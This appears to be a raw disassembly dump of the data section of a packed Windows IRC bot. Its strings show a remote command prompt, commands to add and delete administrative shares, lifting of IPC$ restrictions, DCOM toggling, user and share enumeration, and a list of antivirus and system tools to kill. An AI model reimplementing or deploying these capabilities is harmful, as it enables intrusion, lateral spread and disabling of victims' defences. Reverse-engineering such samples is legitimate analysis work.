aStopped_0 db 'Stopped',0 ; DATA XREF: UPX0:004390C4�o
aStop_0 db 'Stop',0 ; DATA XREF: UPX0:004390C0�o
align 4
aStarted db 'Started',0 ; DATA XREF: UPX0:004390B8�o
aStart_0 db 'Start',0 ; DATA XREF: UPX0:004390B4�o
align 4
aListed db 'Listed',0 ; DATA XREF: UPX0:004390AC�o
align 4
aList_1 db 'List',0 ; DATA XREF: UPX0:004390A8�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: UPX0:004390A0�o
aDelete_0 db 'Delete',0 ; DATA XREF: UPX0:0043909C�o
align 4
aAdded db 'Added',0 ; DATA XREF: UPX0:off_439094�o
align 4
aAdd db 'Add',0 ; DATA XREF: UPX0:off_439090�o
unk_439158 db 2Dh ; - ; DATA XREF: sub_4186C2+67�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
unk_43917C db 2Dh ; - ; DATA XREF: sub_4186C2+51�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 4
unk_4391A8 db 2Dh ; - ; DATA XREF: sub_4186C2+33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_4187DE+12C�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_4187DE:loc_4188F6�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_4187DE:loc_4188EF�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_4187DE:loc_4188E8�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_4187DE:loc_4188E1�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_4187DE:loc_4188DA�o
db ' correct access rights.',0
align 10h
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_4187DE:loc_4188D3�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_4187DE:loc_4188CC�o
align 4
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_4187DE:loc_4188C5�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_4187DE:loc_4188BE�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_4187DE:loc_4188B7�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_4187DE:loc_41888C�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_4187DE:loc_418885�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_4187DE:loc_41887E�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_4187DE:loc_418877�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_4187DE+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_4187DE:loc_41884C�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_4187DE:loc_418842�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_4187DE:loc_418838�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_4187DE:loc_41882E�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_4187DE:loc_418824�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_4187DE+3C�o
align 10h
aSSS db '%s: %s (%s)',0 ; DATA XREF: sub_41895C+EB�o
aStopped db ' Stopped',0 ; DATA XREF: sub_41895C:loc_418A28�o
aStarting db ' Starting',0 ; DATA XREF: sub_41895C:loc_418A21�o
aStoping db ' Stoping',0 ; DATA XREF: sub_41895C:loc_418A1A�o
aRunning db ' Running',0 ; DATA XREF: sub_41895C:loc_418A13�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_41895C:loc_418A0C�o
aPausing db ' Pausing',0 ; DATA XREF: sub_41895C:loc_418A05�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_41895C:loc_4189FE�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_41895C+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_41895C+25�o
align 4
unk_4396FC db 2Dh ; - ; DATA XREF: sub_418A99+AC�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 10h
dword_439720 dd 234032Dh, 274656Eh, 25202D03h, 68732073h, 3A657261h
; DATA XREF: sub_418A99+8A�o
dd 73252720h, 27h
unk_43973C db 2Dh ; - ; DATA XREF: sub_418A99+58�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_418C8F+D0�o
align 10h
aNo db 'No',0 ; DATA XREF: sub_418C8F+BC�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_418C8F+B5�o
unk_439788 db 2Dh ; - ; DATA XREF: sub_418C8F+76�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 10h
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_418C8F+26�o
align 4
unk_4397E8 db 2Dh ; - ; DATA XREF: sub_418DB0+B7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 10h
unk_439810 db 2Dh ; - ; DATA XREF: sub_418DB0+95�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 10h
unk_439840 db 2Dh ; - ; DATA XREF: sub_418DB0+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 10h
unk_439860 db 2Dh ; - ; DATA XREF: sub_418EF7+3AF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_418EF7+385�o
align 4
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_418EF7+35A�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_418EF7+32F�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_418EF7+304�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_418EF7+2D9�o
align 4
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_418EF7+2AE�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_418EF7+283�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_418EF7+258�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_418EF7+22D�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_418EF7+202�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_418EF7+1D7�o
align 10h
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_418EF7+1AC�o
align 10h
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_418EF7+181�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_418EF7+156�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_418EF7+12B�o
aGuest db 'Guest',0 ; DATA XREF: sub_418EF7:loc_419016�o
align 10h
aUser_2 db 'User',0 ; DATA XREF: sub_418EF7:loc_41900F�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_418EF7:loc_419008�o
align 4
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_418EF7+DA�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_418EF7+AF�o
align 4
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_418EF7+84�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_418EF7+50�o
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_4192E0+14F�o
align 4
unk_439A1C db 2Dh ; - ; DATA XREF: sub_4192E0+F7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 4
aS_4 db ' %S',0 ; DATA XREF: sub_4192E0+BE�o
align 10h
unk_439A50 db 2Dh ; - ; DATA XREF: sub_4192E0+7A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_4192E0+29�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_419460:loc_41957D�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_419460:loc_419576�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_419460:loc_41956F�o
align 10h
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_419460:loc_419568�o
align 10h
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_419460:loc_419561�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_419460:loc_419544�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_419460:loc_41953D�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_419460:loc_419536�o
align 4
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_419460+CF�o
db ' the domain.',0
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_419460:loc_41950B�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_419460:loc_419504�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_419460:loc_4194FD�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_419460:loc_4194F3�o
align 10h
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_419460+89�o
align 4
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_419460:loc_4194CD�o
align 10h
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_419460:loc_4194C3�o
align 10h
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_419460:loc_4194B9�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_419460:loc_4194AF�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_419460:loc_4194A5�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_419460+3B�o
align 4
dword_439D58 dd 234032Dh, 274656Eh, 25202D03h, 34032073h, 76726553h
; DATA XREF: sub_419594+AB�o
dd 3A037265h, 20532520h, 654D3403h, 67617373h, 203A0365h
dd 5325h
unk_439D84 db 2Dh ; - ; DATA XREF: sub_419594+81�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
dd 6D202D03h, 61737365h, 73206567h, 20746E65h, 63637573h
dd 66737365h, 796C6C75h
db 0
align 4
dword_439DAC dd 7530h ; DATA XREF: sub_419A01+12�r
off_439DB0 dd offset aRegedit_exe ; DATA XREF: sub_4196BD+CB�o
; "regedit.exe"
dd offset aMsconfig_exe ; "msconfig.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aMsblast_exe ; "msblast.exe"
dd offset aZapro_exe ; "zapro.exe"
dd offset aNavw32_exe ; "navw32.exe"
dd offset aNavapw32_exe ; "navapw32.exe"
dd offset aZonealarm_exe ; "zonealarm.exe"
dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset dword_439EB8
dd offset dword_439EAC
dd offset dword_439EA0
dd offset dword_439E94
dd offset dword_439E88
dd offset dword_439E7C
dd offset dword_439E6C
dd offset dword_439E60
dd offset dword_439E54
dd offset dword_439E48
dd offset dword_439E3C
dd offset dword_439E2C
dd offset dword_439E20
dd offset dword_439E10
dword_439E10 dd 72313169h, 346E3435h, 6578652Eh, 0 ; DATA XREF: sub_4196BD+EC�o
; UPX0:00439E0C�o
dword_439E20 dd 6E757269h, 78652E34h, 65h ; DATA XREF: UPX0:00439E08�o
dword_439E2C dd 75643364h, 74616470h, 78652E65h, 65h ; DATA XREF: UPX0:00439E04�o
dword_439E3C dd 65746172h, 6578652Eh, 0 ; DATA XREF: UPX0:00439E00�o
dword_439E48 dd 74617373h, 78652E65h, 65h ; DATA XREF: UPX0:00439DFC�o
dword_439E54 dd 736E6977h, 652E7379h, 6578h ; DATA XREF: UPX0:00439DF8�o
dword_439E60 dd 756E6977h, 652E6470h, 6578h ; DATA XREF: UPX0:00439DF4�o
dword_439E6C dd 4D737953h, 50586E6Fh, 6578652Eh, 0 ; DATA XREF: UPX0:00439DF0�o
dword_439E7C dd 61656262h, 2E656C67h, 657865h ; DATA XREF: UPX0:00439DEC�o
dword_439E88 dd 696E6550h, 2E323373h, 657865h ; DATA XREF: UPX0:00439DE8�o
dword_439E94 dd 6B656574h, 2E736469h, 657865h ; DATA XREF: UPX0:00439DE4�o
dword_439EA0 dd 4C42534Dh, 2E545341h, 657865h ; DATA XREF: UPX0:00439DE0�o
dword_439EAC dd 7663736Dh, 2E323362h, 657865h ; DATA XREF: UPX0:00439DDC�o
dword_439EB8 dd 69737973h, 2E6F666Eh, 657865h ; DATA XREF: UPX0:00439DD8�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: UPX0:00439DD4�o
align 4
aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: UPX0:00439DD0�o
aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: UPX0:00439DCC�o
align 10h
aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: UPX0:00439DC8�o
align 10h
aNavw32_exe db 'navw32.exe',0 ; DATA XREF: UPX0:00439DC4�o
align 4
aZapro_exe db 'zapro.exe',0 ; DATA XREF: UPX0:00439DC0�o
align 4
aMsblast_exe db 'msblast.exe',0 ; DATA XREF: UPX0:00439DBC�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: UPX0:00439DB8�o
aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: UPX0:00439DB4�o
align 10h
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: UPX0:off_439DB0�o
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_4196BD+191�o
align 4
unk_439F68 db 2Dh ; - ; DATA XREF: sub_4198EC:loc_419973�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListFai db ' process list failed',0
align 4
unk_439F8C db 2Dh ; - ; DATA XREF: sub_4198EC+80�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 10h
unk_439FB0 db 2Dh ; - ; DATA XREF: sub_4198EC+19�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_419A89+33�o
unk_439FE0 db 2Dh ; - ; DATA XREF: sub_419B10:loc_419C42�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess.',0Dh,0Ah,0
unk_43A010 db 2Dh ; - ; DATA XREF: sub_419B10+10F�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 4
unk_43A038 db 2Dh ; - ; DATA XREF: sub_419B10:loc_419BF6�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess',0Dh,0Ah,0
align 4
unk_43A068 db 2Dh ; - ; DATA XREF: sub_419C65+194�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 4
unk_43A09C db 2Dh ; - ; DATA XREF: sub_419C65+14C�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteCommandP db '- Remote Command Prompt',0
align 10h
off_43A0C0 dd offset dword_43A0F8 ; DATA XREF: sub_419E7A+1B3�o
; sub_41A19E+17A�o
align 8
dd offset dword_43A0F0
align 10h
off_43A0D0 dd offset dword_43A0EC ; DATA XREF: sub_41A19E+1E3�o
dd offset dword_43A0E8
dd offset dword_43A0E4
dd offset dword_43A0E0
dword_43A0E0 dd 5C3A44h ; DATA XREF: sub_419E7A+217�o
; UPX0:0043A0DC�o
dword_43A0E4 dd 2444h ; DATA XREF: UPX0:0043A0D8�o
dword_43A0E8 dd 5C3A43h ; DATA XREF: UPX0:0043A0D4�o
dword_43A0EC dd 2443h ; DATA XREF: UPX0:off_43A0D0�o
dword_43A0F0 dd 494D4441h, 244Eh ; DATA XREF: UPX0:0043A0C8�o
dword_43A0F8 dd 24435049h, 0 ; DATA XREF: UPX0:off_43A0C0�o
dword_43A100 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+2E5�o
; sub_41A19E+2DB�o
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 10h
dword_43A130 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+2CF�o
aNetworkSharesD db '- Network shares deleted.',0
align 4
dword_43A158 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_41A0DC�o
aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_43A184 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+25B�o
aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0
align 4
dword_43A1A8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_41A049�o
aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
dword_43A1D4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+1C8�o
aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0
align 4
dword_43A1F8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_419FAC�o
; sub_41A19E:loc_41A2CC�o
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_43A228 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_419FA5�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
dword_43A264 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A:loc_419F87�o
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 4
dword_43A298 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+106�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_419E7A+ED�o
; sub_41A19E+ED�o
align 4
dword_43A2E8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+91�o
; sub_41A19E+91�o
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
dword_43A318 dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 64204D4Fh
; DATA XREF: sub_419E7A:loc_419EE7�o
dd 62617369h, 2E64656Ch, 0
dword_43A338 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_419E7A+66�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_419E7A+54�o
; sub_41A19E+54�o
align 4
dword_43A368 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+2C3�o
aNetworkSharesA db '- Network shares added.',0
aC_0 db '%c:\',0 ; DATA XREF: sub_41A19E+230�o
align 4
aC_1 db '%c$',0 ; DATA XREF: sub_41A19E+219�o
dword_43A398 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E:loc_41A33D�o
; sub_41A19E:loc_41A40E�o
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
dword_43A3C0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+198�o
; sub_41A19E+269�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
dword_43A3E0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E:loc_41A2C5�o
aFailedToOpen_0 db '- Failed to open IPC$ restriction registry key.',0
dword_43A41C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E:loc_41A2A7�o
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 4
dword_43A454 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+102�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 4
dword_43A494 dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 65204D4Fh
; DATA XREF: sub_41A19E:loc_41A20B�o
dd 6C62616Eh, 2E6465h
dword_43A4B0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A19E+66�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 4
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41A4D2+E1�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_43A508 dd 234032Dh, 65657073h, 73657464h, 2D030274h, 75450220h
; DATA XREF: sub_41A6AF+1A7�o
dd 65706F72h, 25203A02h, 626B2064h, 732F7469h, 53550220h
dd 203A0241h, 6B206425h, 2F746962h, 41022073h, 2616973h
dd 6425203Ah, 69626B20h, 20732F74h, 65764102h, 65676172h
dd 25203A02h, 626B2064h, 732F7469h, 0
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41A6AF+C4�o
align 4
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41A6AF+BD�o
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41A6AF+B6�o
align 4
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41A6AF+AF�o
align 4
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41A6AF+A8�o
align 10h
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41A6AF+A1�o
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41A6AF+9A�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41A6AF+93�o
align 4
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41A6AF+8C�o
align 4
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41A6AF+85�o
align 4
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41A6AF+7E�o
align 4
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41A6AF+77�o
align 4
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41A6AF+70�o
align 4
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41A6AF+69�o
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41A6AF+62�o
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41A6AF+5B�o
align 4
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41A6AF+54�o
align 4
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41A6AF+4D�o
align 4
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41A6AF+46�o
align 4
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41A6AF+3F�o
align 4
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41A6AF+38�o
align 4
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41A6AF+31�o
align 4
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41A6AF+2A�o
align 4
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41A6AF+23�o
align 4
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41A6AF+1C�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41A6AF+15�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_41A88C+52�o
dword_43A720 dd 234032Dh, 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
; DATA XREF: sub_41AA43+297�o
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
dword_43A7FC dd 4D3A6464h, 793A4D4Dh, 797979h ; DATA XREF: sub_41AA43+192�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41AA43:loc_41ABA7�o
align 10h
aSS_2 db '%s (%s)',0 ; DATA XREF: sub_41AA43+EB�o
dword_43A828 dd 234032Dh, 6974656Eh, 26F666Eh, 2202D03h, 65707954h
; DATA XREF: sub_41ACF7+A4�o
dd 25203A02h, 25282073h, 202E2973h, 20504902h, 72646441h
dd 2737365h, 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h
dd 7325203Ah, 2Eh
off_43A86C dd offset loc_412F4E ; DATA XREF: sub_41ACF7:loc_41AD63�o
dword_43A870 dd 4E414Ch ; DATA XREF: sub_41ACF7:loc_41AD59�o
dword_43A874 dd 6C616944h, 70752Dh ; DATA XREF: sub_41ACF7+5B�o
dword_43A87C dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h ; DATA XREF: sub_41ACF7+48�o
unk_43A88C db 2Dh ; - ; DATA XREF: sub_41ADB6:loc_41AF6F�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 4
unk_43A8BC db 2Dh ; - ; DATA XREF: sub_41ADB6:loc_41AF68�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 4
dword_43A8E8 dd 234032Dh, 69736976h, 2D030274h, 766E4920h, 64696C61h
; DATA XREF: sub_41ADB6+1A0�o
dd 4C525520h, 2Eh
unk_43A904 db 2Dh ; - ; DATA XREF: sub_41ADB6:loc_41AF49�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 10h
dword_43A940 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h
; DATA XREF: sub_41ADB6+18C�o
dd 64657469h, 2Eh
dword_43A95C dd 2A2F2Ah ; DATA XREF: sub_41ADB6+3B�o
dword_43A960 dd 276F8229h ; DATA XREF: sub_41B8D8+4�w sub_41B8E2�r ...
align 10h
dword_43A970 dd 173Fh ; DATA XREF: sub_41C679+D�r
dd 9875h, 9873h
off_43A97C dd offset sub_41C748 ; DATA XREF: sub_41B784�r
dd offset nullsub_2
dd offset nullsub_2
dword_43A988 dd 1B3Fh ; DATA XREF: sub_41C7BF+D�r
dword_43A98C dd 19930520h, 4 dup(0) ; DATA XREF: sub_41CC41+2�o
; sub_41CC4A+2�o
off_43A9A0 dd offset sub_41B7C2 ; DATA XREF: sub_41DA29+1C�r
dword_43A9A4 dd 2 ; DATA XREF: sub_423590+E�r
; sub_4235C9+46�r ...
dd 10h, 0
off_43A9B0 dd offset off_43A9B0 ; DATA XREF: sub_41E976+D�o
; sub_41E976+69�o ...
off_43A9B4 dd offset off_43A9B0 ; DATA XREF: sub_41E976:loc_41E9F6�r
; sub_41E976+89�w ...
dd offset dword_43A9C8
dd offset dword_43A9C8
dword_43A9C0 dd 0FFFFFFFFh ; DATA XREF: sub_41E976�r
; sub_41EABA:loc_41EB07�w
dd 0FFFFFFFFh
dword_43A9C8 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: UPX0:0043A9B8�o
; UPX0:0043A9BC�o
off_43C9D0 dd offset off_43A9B0 ; DATA XREF: sub_41EABA+15�r
